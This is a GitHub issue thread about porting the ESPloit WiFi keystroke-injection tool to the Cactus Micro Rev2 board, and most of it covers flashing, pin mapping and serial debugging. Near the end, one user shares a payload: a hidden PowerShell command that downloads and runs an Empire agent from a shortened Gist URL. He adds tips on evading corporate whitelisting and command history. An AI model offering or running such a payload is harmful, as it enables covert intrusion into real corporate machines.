[Enhancement] Porting to Cactus Micro Rev2

[minkione]

I am looking to port it on a Cactus Micro Rev2 since it uses both ESP8266 and ATmega32u4 Chip. Maybe you already thought about it. :)

[exploitagency]

Thats a great idea, I've never used one of these. Without doing any research do you upload one program to the ESP and another to the 32u4? If so it would be as easy as changing the pin settings for rx/tx I imagine... Will look into it when I get some free time. Thanks for the suggestion. Let me know if you make any progress.

EDIT: So after doing about 30 seconds of research it looks like you upload the esp8266 programmer sketch to the arduino then flash the esp8266, then upload your arduino sketch. This should be an incredibly easy port if it is as simple as that. Literally changing RX/TX in BOTH the ESP and ARDUINO sketch should be enough if I recall my code correctly, I haven't been deep in the code of this project in a while.

So give it a shot, let me know how it goes. I'm going to order a couple right now.

[minkione]

The flow should be:

• Flash the cactusMicro with the ESP8266 firmware loader [0]
• Use ESP8266Flasher.exe to flash the ESP firmware [1]
• Upload the CactusMicro .ino Sketch
• The device should boot and wifi AP up&running

I tried with your skecthes for both the 32u4 and ESP8266... but are failing... I guess I will need further investigation (since I am kinda new to ESP chipsets). But looks promising! :) 👍

[0] https://github.com/AprilBrother/cactus-micro-r2/blob/master/libraries/CactusMicro/examples/esp8266Programmer/esp8266Programmer.ino [1] https://github.com/nodemcu/nodemcu-flasher/blob/master/Win64/Release/ESP8266Flasher.exe

[exploitagency]

How are you failing? Need more info. You need to change the rx/tx from both sketches. Then you need to change the WiFi info in the ESP8266 sketch by default it is a hidden SSID of Exploit with a password of DotAgency, IIRC. Readme should clarify. PS What is the cheapest source for one of these dev board? Only place I found it in stock was ebay for a little under $20, thats fairly pricey for what it is. I'll order just one if thats the case.

[minkione]

I succesfully compile yours ESP firmware into a .bin file and succesfully gets uploaded into the cactus micro... Afterwards I succesfully upload yours 32u4 sketch... and so far so good. Then I wait (u know the usual 90+ secs for first bootup)... but nothing happens (no SSID). Of course I did change your hiddens SSID settings ;]

As I said I need to read carefully your code and see what it fails :) Troubleshooting or Debugging suggestions are welcome though :)

[exploitagency]

Hold on...

Paste how you have these settings

// ***Begin WiFi Configuration***
const int accesspointmode = 1; // set to 0 to connect to an existing network or leave it set to 1 to use the esp8266 as an access point

// SSID and PASSWORD of network go below
const char ssid[] = "Exploit";
const char password[] = "DotAgency";
// channel and hidden are for when using the esp8266 as an access point
const int channel = 6;
const int hidden = 1; // set int hidden to 0 to broadcast SSID of access point or leave as 1 to hide SSID

// Configure Networking
IPAddress local_IP(192,168,1,1); //IP of the esp8266 server
IPAddress gateway(192,168,1,1);
IPAddress subnet(255,255,255,0);

// Port for web server
ESP8266WebServer server(80);

Only change you need to make for testing is const int hidden = 1; // s to const int hidden = 0; // s

You may need to manually format the SPIFFS file system... It should automatically do it though

The 90+ seconds is the spiffs being formatted, this is a one time deal, afterwards boot is MUCH faster

PS: Do you have a source for these boards cheap?

EDIT: The anticipation is killing me... this is such a cool little board, I can't believed I released this project without noticing this board... haha.

Perhaps you need to set the size of the spiffs in your programmer

Generic module 512k 64k, 128k Generic module 1M 64k, 128k, 256k, 512k Generic module 2M 1M Generic module 4M 3M Adafruit HUZZAH 4M 1M, 3M

I think the cactus uses Esp03 at 512k meaning use a 64k spiffs, don't quote me on that, theres so many different version being referred to as Rev2 its hard for me to tell. Clones!!!

Read serial from the ESP8266 itself and it will output debug messages to an extent like boot, started wifi, web server, etc

[exploitagency]

Aha! I remember a problem I had. I couldn't always see the network when using my USB cable to power the device, these ESP dev boards are power hungry, try using external batteries to power it and see if it boots up right. EDIT: I think it was just the FTDI didn't have the current to boot the ESP but once I wired it to the 32u4 and ran it off usb it was fine.

See what VIN specs are, if it can handle 6V then do 4 AA's or AAA's in series.(Pos wired to Neg, etc.)

From ebay ad it says

Input voltage 5v usb 4.3-12v raw

It says not to use usb and vin together..in ebay ad. im not sure about this... I feel like maybe it was the initial boot formatting spiffs etc that my usb didnt provide enough current or maybe my usb hub had external power that i hid it inside of and i always needed external power. Its been a while since ive visitted this project sorry the minute details have been lost. EDIT: I think it was just the FTDI didn't have the current to boot the ESP but once I wired it to the 32u4 and ran it off usb it was fine.

Hope I gave enough tips for you to have success. Please do post when you figure out anything! Aside from the tiny file system of an esp03 vs plentiful large file system of the eps12 i used i think the cactus is a good choice for smaller payloads. That is if it proves functional at all.

One more thing I noticed based on what your saying. To paraphrase and not be very accurate at all: Get the Arduino in ESP8266 programmer mode Open up Arduino IDE: Arduino IDE 1.6.11 or thereabouts Make sure this is installed: Board Manager/Libraries: esp8266 by ESP8266 Community version 2.3.0 then open esp sketch choose arduino as programmer or whatever and flash...

I made the esp8266 code with this library which you will need: esp8266 by ESP8266 Community version 2.3.0 and I made it as an arduino "sketch" this may also be a snag your having....

I'm feeling like this might be an issue: Use ESP8266Flasher.exe to flash the ESP firmware [1] I would instead have arduino ide set up with appropriate library and choose the proper programmer from list(arduino as programmer or whatever).

If I buy a cactusMicro rev2 I'll get this working on Linux first then setup a Windows VM and do some testing.

[exploitagency]

In case your just reading emails please come back and check actual issue page and look at my edits. I think youll have enough info now to have success. Please keep me updated!

[minkione]

Sorry mate! I was away from my laptop! ✌️

1) I have tried with the HUB USB (externally powered) no luck. I guess is definitely something deeper in the differences between your 32u4-based board and mine (a.k.a. cactus micro rev2) About it, I can confirm that the cactus do work with another similar project [1] (p.s. I like basic4 idea of using the serial communication as TX/RX channel to get a shell back..., but the usage of external controllers, rather than yours Web-based solution... is horrible option IMO. Much better your web-UI).

2) good point about flashing + arduino + ESP firmware! I need to look at it and try the 1.6.11. Right now I am using the 1.8.x + ESP8266 2.3.0.

3) I need to look at the [1] codebase and see how it differs from your ESP sketch. So far I see that the syntax is slightly different, but didn't dig deeper. (Time is always a problem 🤕 )

[1] https://github.com/basic4/WiDucky

P.S. About the version I have, it is the original one http://wiki.aprbrother.com/wiki/Cactus_Micro_Rev2 P.P.S. Overall, I am quite good with OpenWRT and Linux in general... but Arduino and ESP are not my daily hobbies... so I deeply sucks and horribly slow 😛

[exploitagency]

Yeah flash the esp with the arduino ide, and choose esp03 settings for spiffs file system should be 64k with your model i think. I used an esp12

I dont use windows except in vms but will eventually make a vm and try to make it work with cactus if i order one.

Your compiling the code for esp in arduino ide right? Try using arduinoide to flash the esp as well.

[exploitagency]

Does your esp flasher ask you to specify memory offsets?

[minkione]

Forgot to post you the shop where I bought it: https://www.aliexpress.com/item/Cactus-Micro-Rev2-Esp8266-ESP-03-for-Arduino-Compatible-Male-Header-WIFI-chip-esp8266-ESP8266-WIFI/32715064135.html

As you can see I can set in the Flasher the memory size (i.e. 512K for ESP-03). I also tried with Arduino flasher, but no luck. The idea behind esp8266Programmer.ino is to flash the cactus 32u4 to act as pass-through to the serial connection TX/RX of the ESP-03 in order to push from Flasher.exe (through serial) the firmware into the ESP-03. Afterwards, once successfully pushed the ESP firmware, you can reflash the 32u4 with its sketch (in your case a.k.a. arduino-sketch.ino).

[exploitagency]

You compile the code for esp in arduino ide right, dont see how itd compile elsewise?

Make sure in arduino ide settings are right for spiffs size, though i think it happens during programming setting memory offsets. I think this is the problem and flashing.

Whats under the config tab of flasher.exe?

Keep trying different programmers in settings for arduino ide. I feel it will be "arduino as programmer" or maybe an esp03 option.

Or try uploading code that uses spiffs and see if it will work.

Is there anyway you can open a serial emulator and watch the esp boot? This will tell us a lot. Maybe even leaving the arduino in programmer mode will help if its just serial passthrough.

[minkione]

I need to add that in the list of todo things. Now I am looking at the syntax differences between your skecthes and these ones. https://github.com/basic4/WiDucky/tree/master/Cactus

Somehow I have the feeling that, despite the fact both HW have the same Atmel 32u4... the lilypad (a.k.a. cactusmicro) is using a slightly different syntax than your CJMCU-Beetle.

Example.... if u look at the ESP sketch for the WiDucky... https://github.com/basic4/WiDucky/blob/master/Cactus/sketch_wifiduckCactus_ESPModule.ino And compare with yours https://github.com/exploitagency/github-ESPloit/blob/master/code/esp-sketch/esp-sketch.ino you can see immediately the differences.

in your case you use the CJMCU-Beetle to talk with the ESP

Serial.print("Starting Access Point ... ");
Serial.println(WiFi.softAP(ssid, password, channel, hidden) ? "Success" : "Failed!");

Instead in sketch_wifiduckCactus_ESPModule.ino is straight

void setup() { 
  //enable the wifi chip
  pinMode(LED_BUILTIN, OUTPUT);
  //external reset mode
  //pinMode(12,INPUT_PULLUP);
  WiFi.mode(WIFI_AP);
  WiFi.softAP("WiDucky", "quackings");
  Serial.begin(19200);
  server.begin();
  ledOn(false);
}

Overall, I believe some parts of your code will have to be ported for the cactus. (of course is just an early assumption, since is less than 72 hours I am using this cactus micro! :)

[exploitagency]

Serial.print("Starting Access Point ... "); Serial.println(WiFi.softAP(ssid, password, channel, hidden) ? "Success" : "Failed!");

What this does is start a line Starting Access Point....

Then it starts the access point and based on output it ends the line with Success or Failed and line breaks.

Starting Access Point....[access point starts] Success

Like that...

Its the same thing.

Theirs is WiFi.softAP("WiDucky", "quackings"); Acces point WiDucky, pass quackings

Mine WiFi.softAP(ssid, password, channel, hidden) uses variables too, ssid=? password=? channel=? hidden=? etc...

I feel like its an issue with spiffs

please try a serial emulator and see what it is saying

[exploitagency]

Maybe try adding a new line containing SPIFFS.format() above line 86 SPIFFS.begin(); in esp-sketch.ino.

Perhaps it isn't able to start spiffs and stops before it reaches any configuration.

In my testing it seemed the boards automatically formatted the file system if it didn't exist, but I only tested what I believed to be a few virgin boards.

Another possibility is that the pins set in the sketch are interfering with something. I'll have to look at some pin outs.

Try this ESP8266 ---- Cactus GPIO13 ---- 2 (For I2C etc) GPIO12 ---- 3 (For I2C etc)

esp-sketch.ino change: const int RXpin=12; const int TXpin=13;

arduino-sketch.ino const int RXpin=3; const int TXpin=2;

Start with unmodified virgin ino files exactly as downloaded, only change the above and hidden to 0 in esp-sketch.ino const int hidden = 0;

PS: I think you can use the ESP GPIO numbers, but you may need to change those to actual pin #'s, I don't recall, this is just off the top of my head from looking up the cactus micro wiki. http://wiki.aprbrother.com/wiki/Cactus_Micro_Rev2_Hookup_Guide#ESP8266_Pins

[exploitagency]

Thanks for sending links to working Cactus Micro Rev2 examples, I was just able to investigate it and review the code. It looks like you'll need to enable ch_pd manually through the arduino's code.

So ignoring the other replies and following this single post with changes to enable esp and changes to rx and tx pins and hidden ssid and if it works I already added comments in the code but havent posted it live yet just let me know if it works and I will post the commit and give you some credit for getting things tested.

I'm pretty confident I found the culprit... and you were right about needing to add additional code, two lines for enable ch_pd plus changing the configuration of rx,tx variables should do it.

Start with unmodified ino files exactly as downloaded from repo, only change the below for testing purposes

Open arduino-sketch.ino

Change starting at line 51:

void setup() { 
  SOFTserial.begin(4800);

To:

void setup() { 
  pinMode(13, OUTPUT);
  digitalWrite(13,HIGH);
  SOFTserial.begin(4800);

and in arduino-sketch.ino change: const int hidden = 0;

I can't believe I didn't think of this earlier, on the cactus micro rev2 I just assumed the esp03 was on when the arduino was on but we have to manually turn on the ESP8266 first apparently from the Arduino, which is actually a smart thing to do saving battery power and what not. ::face-palm::

ENABLE (CH_PD) 13 http://wiki.aprbrother.com/wiki/Cactus_Micro_Rev2_Hookup_Guide#ESP8266_Pins

also do:

esp-sketch.ino change: const int RXpin=12; const int TXpin=13;

arduino-sketch.ino change: const int RXpin=3; const int TXpin=2;

Good luck, let me know how it goes, I can always send modified ino files if I am confusing you or not being clear enough because thus far I've thought of everything but the right answer, but now I believe I've got it. I'll be ordering a board or three tonight, thanks for turning me onto this one. If only it was an Esp12 though... someone needs to make that.

[minkione]

Ok, little update! The firmware update worked like charm with the following settings.

I of course applied the mods you suggested on a fresh repo and now I am able to:

• see the SSID
• connect to it and get an IP
• Upload a payload and see it

Sadly it doesn't execute the HID emulation part (i.e. nothing is typed on the keyboard. FYI I use by default US one).

I feel we are very close to the solution of the riddle! 👍 🤞

[minkione]

What if using Keyboard.print(keycode); we use Keyboard.write(keycode); ?

[minkione]

That's funny... I replaced all Keyboard.print(keycode) with Keyboard.write(keycode) and I got...

C:\Program Files (x86)\Arduino\libraries\Keyboard\src/Keyboard.h:91:10: note:   no known conversion for argument 1 from 'String' to 'uint8_t {aka unsigned char}'

exit status 1
no matching function for call to 'Keyboard_::write(String&)'

But if I look at the specs... https://www.arduino.cc/en/Reference/KeyboardWrite should work...

Another funny fact... is that in https://github.com/basic4/WiDucky/blob/master/Cactus/sketch_wifiduck_Cactus4.ino.ino The Keyboard.write() works!

default:
                    if(multi == 0)
                    { 
                       //Normal Single character code
                       Keyboard.write(inpx);
                       delay(20);
                    }
                    else
                    {
                       //Part of a multi-key command 
                       Keyboard.press(inpx);
                       delay(30);
                    }
break;

[exploitagency]

Nah leave the source the same. The problem must be the rx and tx pins. Maybe i made a mistake, swap rx and tx values with each other that i gave you but only in one sketch not in both. I think thatll do it

[exploitagency]

esp-sketch.ino change: const int RXpin=12; const int TXpin=13;

Like below arduino-sketch.ino change: const int RXpin=2; const int TXpin=3;

[minkione]

No luck. Will gonna try: esp-sketch.ino change: const int RXpin=12; const int TXpin=13;

arduino-sketch.ino change: const int RXpin=3; const int TXpin=2;

[minkione]

No luck as well. At this point is left only this option... esp-sketch.ino change: const int RXpin=12; const int TXpin=13;

arduino-sketch.ino change: const int RXpin=2; const int TXpin=3;

[exploitagency]

Problem is which pins are set up to rx and tx with each other im pretty sure. I will inspect it after work. Keep playing with those pins and look at pinout in linked wiki

[minkione]

And.... doesn't work as well. I will read carefully cactus micro wiki and schematics. I am missing something obvious. ;]

[exploitagency]

Rx goes to tx and tx goes to rx Look at two pins connected with eah other on esp and arduino in cactus

[minkione]

I believe I got the point. Check the wiki http://wiki.aprbrother.com/wiki/Cactus_Micro_Rev2_Hookup_Guide

ESP8266 Pins

The Cactus Micro Rev2 has connected to esp8266 with these pins.
ESP8266     Cactus Micro Rev2
GPIO0   12
ENABLE (CH_PD)  13
RX  TXO (Serial1)
TX  RXI (Serial1)
GND     GND
GPIO13  2 (For I2C etc)
GPIO12  3 (For I2C etc)
GPIO14  A4 

We need to user Serial1 and not SoftwareSerial SOFTserial(RXpin,TXpin); ! 😄 Ok, I am too late and need to wake up in few hours. Tomorrow I'll continue! ;]

[exploitagency]

You have to go to view payloads and run the payload once you upload it. And your uploading a payload from the examples for testing? Be sure to note the format for scripting one too. Just making sure... need to eliminate the obvious before digging too deep. Could it be a locale issue with you using a different language keyboard?

For clarification I used serial for debugging over serial and SOFTserial to communicate between ESP and 32u4. But feel free to make any mods hope you get it working.

I won't be home at any reasonable hour maybe tomorrow I will look into it more. But definitely trying to buy my own boards tonight when I get home so if all else fails a month or two from now when they arrive I will get it working. Keep me updated thanks.

I think your right btw in that serial1 could work but I also think software serial is still possible to use somehow. Sorry if anything offends you I always have to ask simple questions. I just try to keep a codebase fairly universal with minimal changes. Let me know how it goes thanks for having so much interest in the project and dealing with all these hurdles.

Something that keeps screwing me up is stuff like this http://www.globalsources.com/si/AS/Beijing-April/6008848879733/pdtl/Beacon-modules/1129250477.htm This is a rev1 being advertised as a rev2 right?

It says

How it works: The ESP8266 chip communicates with Atmega32U4 through the SoftwareSerial or Serial (hardware serial port) It can be switched by a jumper The default port for communication is SoftwareSerial port (RX: 11, TX: 12) The pin 13 is connected to pin CH_PD of ESP8266 Put the pin 13 high to enable ESP8266 chip

You don't have a jumper right?

If you do thats the trick, but the more I look at it I think your dead on the money and we will have to change to using Serial1 as much as I hate to switch things up, after all it is somewhat of a PORTING of code to a different dev board as similar as they may be it is still different. Looks like you need to run serial1 on arduino and serial or softserial on the esp, it may mess some things up with the serial debugger messages being output from the esp causing the arduino to type something, you may need to comment those out in the esp sketch. One reason I used softserial...

[minkione]

My HW is a REV2. https://www.aliexpress.com/item/Cactus-Micro-Rev2-Esp8266-ESP-03-for-Arduino-Compatible-Male-Header-WIFI-chip-esp8266-ESP8266-WIFI/32715064135.html

So I was playing a bit in the lunch and here the progress... (still WIP) http://pastebin.com/Dc8X2uLS http://pastebin.com/xX3YrBsP

The idea is that instead of using //SOFTserial..... I use Serial1.xxxxxx

At the end we just need Serial1 to communicate between ESP and 32u4. (In your case, you were using SOFTserial and serial. The latter as debug interface (if enabled).

Overall I still need to read with calm. So far with the sketches I provided you I can see the SSID and get connect/upload stuff. The only part missing is the keystrokes injected... which at this point should be related with the serial communication between ESP and 32u4.

Stay tuned... if I;'ll have time afterwork. 👍

[exploitagency]

I think you'll need to run serial1 on the Arduino and just plain serial on the ESP for the way you are wanting to do the two way communication from ESP-Arduino, at least thats how I interpret the wiki.

The original serial in my project is debugging text for serial emulator to read. If this is the case you'll need to likely comment out some debugger text in the esp sketch if it gets typed up by the Arduino. I'm not sure if any of it interferes and in what scenarios. It will be great to add the cactus micro rev2 to the project though. I've just ordered one.

Its cool having both on one dev board but in the same sense your stuck with the connections they chose unless modifying board.

[exploitagency]

It appears perhaps GPIO0 and 12 and GPIO14 and A4 are actually physically connected and the pins I originally suggested(GPIO12 and GPIO13) are not actually physically connected(despite the misleading chart in wiki) and require J1 and J2 to be soldered.

So lets try these changes to a fresh downloaded copy of the code. It might not work because I think the RX pin on the Arduino needs to be an Interrupt with softwareserial.

ESP8266 ---- Cactus Micro Rev2 GPIO0 12 GPIO14 A4

esp-sketch.ino change:

 const int RXpin=0;
 const int TXpin=14;

arduino-sketch.ino change:

 const int RXpin=12;
 const int TXpin=A4;

and in arduino-sketch.ino change: const int hidden = 0;

Open arduino-sketch.ino

Change starting at line 51:

void setup() { 
  SOFTserial.begin(4800);

To:

void setup() { 
  pinMode(13, OUTPUT);
  digitalWrite(13,HIGH);
  SOFTserial.begin(4800);

---

IF THAT DOESNT WORK!:

I may have solved the issue... Use the SOFTserial like I mentioned before and make the changes below:

Of course start with a fresh unmodified copy of repo.

esp-sketch.ino change:

 const int RXpin=13;
 const int TXpin=12;

arduino-sketch.ino change:

 const int RXpin=3;
 const int TXpin=2;

and in arduino-sketch.ino change: const int hidden = 0;

Open arduino-sketch.ino

Change starting at line 51:

void setup() { 
  SOFTserial.begin(4800);

To:

void setup() { 
  pinMode(13, OUTPUT);
  digitalWrite(13,HIGH);
  SOFTserial.begin(4800);

NOW! Here is the part that I believe solves it...

Put a solder bridge between the two pins on J1 and then a separate solder bridge between the pins on J2. Obviously do not solder J1 to J2, instead just connecting the two pads at each jump point.

Apparently the GPIO of the ESP03 is actually NOT connected to the 32u4 and is why my solution didn't work previously. This retains all functionality without introducing any bugs involved with the way the ESP is going to throw garbage to the serial port during boot etc...

If you use Serial on ESP and Serial1 on 32u4 the current code may cause garbage to be spit out or introduce bugs when the ESP does its garbage data output and boot messages.

I am certainly excited to receive my cactus micro rev2 board and this is the path I plan on taking before I even flash it. I know some people don't like soldering but this is an easy one right here... if you can't see picture good the points are on the bottom right of the board above pin 16.

NOTE:! Make sure r5 and r6 resistors are missing else clip them off.

Also please forgive me if I am wrong I've been flipping through leonardo 3u4 and the cactus micro pinouts real quick after work. But it seems to me that it would work. So be sure to review my ideas before attempting them.

[minkione]

I went for the refactoring way and worked. I removed the softserial and the debug serial. And just using the Serial1.

arduino-sketch_cactus.txt

esp-sketch-cactus.txt

P.S. I tried both solution you suggested (with the jumpers bridged of course) and didn't work. Thus I went for the sw refactoring. 👍

[exploitagency]

Well good job getting it working, I was hoping I could skate by on only requiring a few lines to be changed vs swapping from softserial to serial1.

Upon reviewing the code are you sure you need all these includes?

include

include

include

include

include

include

include

include

I think this will still cover it, I didn't see any changes to that stuff but maybe I missed something.

include

include

include

include

Also I believe this line can be deleted now as we aren't using the debugger thus the output isn't useful.

WiFi.localIP(); 

I'll do a little more testing once I get mine and make sure it doesn't do anything crazy upon insert of the device and is still working cross platform, because ESP has some garbled junk go over serial when booting. I think it will be fine though, though theres a lot of possibilities of new problems. So everything seems to work good then now? Also if you come up with any neat payloads I can also include them. Will give you credit as well.

[minkione]

Actually, I added those libraries just in case (I still need to clean up the junk leftover from some tests).

One thing I have noticed, is that if I use int DelayLength=2000; everything works fine. But if I try to reduce the delay... example: int DelayLength=1000; It doesn't work properly.

Did you face the same issues while testing your code? That's the reason you put 2000ms then?

P.S. About payloads... the usual one I use is:

Delay
Delay
Delay
Press:131+114
PrintLine:powershell -W Hidden -nop -noni -c "IEX (New-Object Net.Webclient).downloadstring('https://goo.gl/XXXXX')"

Which will execute the Empire Powershell launcher, which usually I host on Gist and then use google shortener to short the URL.

Most of corporate environments are whitelisting both gist.github.com and google, so is easy to deploy an agent in this way. (of course this payload will leave the command powershell -W Hidden -nop -noni -c "IEX (New-Object Net.Webclient).downloadstring('https://goo.gl/XXXXX')" into the cmd history. But u just need to execute it in a cmd to avoid it (no history, but takes more time to type).

Delay
Delay
Delay
Press:131+114
PrintLine:cmd
PrintLine:powershell -W Hidden -nop -noni -c "IEX (New-Object Net.Webclient).downloadstring('https://goo.gl/xxxxx')"

[exploitagency]

I apologize, but yes... I have lowered the delay about as much as is possible without rewriting the whole project more than likely. You can tweak it for different OS or systems(hardware slower or faster). But this is the fairly universally happy cross platform delay I found. Mac, Linux, Windows... the trio.

Why did you remove this line from arduino-sketch?

SOFTserial.println(fullkeys);

vs changing it to

Serial1.println(fullkeys);

[exploitagency]

Ok try this code, I went back through my code adding in the Serial1 and Serial changes as suggested while retaining the old code as comments and kept the line mentioned above for fullkeys and removed more unneeded stuff. Want to make sure we can select to use the max setting for SPIFFS file system since its so much smaller than an ESP12. Though I doubt any of those includes have that great of an impact.

Password is DotAgency

arduino-sketch-cactus.txt esp-sketch-cactus.txt

[minkione]

I removed that SOFTserial.println(fullkeys); because we don't nerd to write back to the ESP. We use the Serial1 just to read fron the ESP and then forward it to the HID through Keyboard()

Doesn't sound legit or I missed somthing?

About your sketches I will have to wait Monday since I forgot the hw t work :facepalm

[exploitagency]

No problem. I'll have to review code over the weekend and see what it was for... its one of my older projects Thanks for all your hard work. Do you have access to test on Mac Windows and Linux?

[minkione]

Usually corporate tatgets are windows. But I willcreate and test some payloads for OSX and Linux as well. As soon as I have them, I'll let ya know ;)

[exploitagency]

Thanks. Looks like that line might have been doing some debugging or testing and can be removed. Idk. Will have to look at it on a real computer with esp code side by side vs on my phone. But I'd wager its a leftover bit that wouldn't hurt to be removed from original source as well.

EDIT: I can pretty well confirm it should work without that line, I must have been debugging things using the ESP's serial output connected to a serial console while writing the code and forgot to remove that line before publishing the code and actually adding the debug to the arduino's serial output... I was just doing a diff earlier when I noticed you removed that line. Looks like we might be good to go then. Let me know if you find a better value for delay too!

Will publish changes once you can confirm its all good to go. Hope my Cactus Micro gets here soon... I trust your testing though and if theres any problems I can work on them once my board gets here. I can also make a separate folder in payloads titled as your username and a little text file with credit and add some of your payloads if you want. Just be sure to arrange them in separate folders by OS if you would, that'll make it easy for people. Thanks again!

[exploitagency]

esp-sketch-cactus.txt arduino-sketch-cactus.txt

[minkione]

Just tried your sketches and of course work. ;]

[exploitagency]

I added the port to the repo! (might be a good idea to test the commit though) I'll close this issue since the port is done but you can still respond to it with payloads or open a new issue. Thanks again for all your help, it was a great suggestion and I am glad it worked out you were right on the moeny. Thanks for all the hard work.

Note: I reverted hidden back to 1 to coincide with readme. Also I don't remember why I chose 4800 for the serial speed, perhaps increasing the baud rate will help us be able to lower the delay slightly.

[minkione]

I am planning to create a payload for OSX as well. As soon as I will have time and access to the macbook. ;]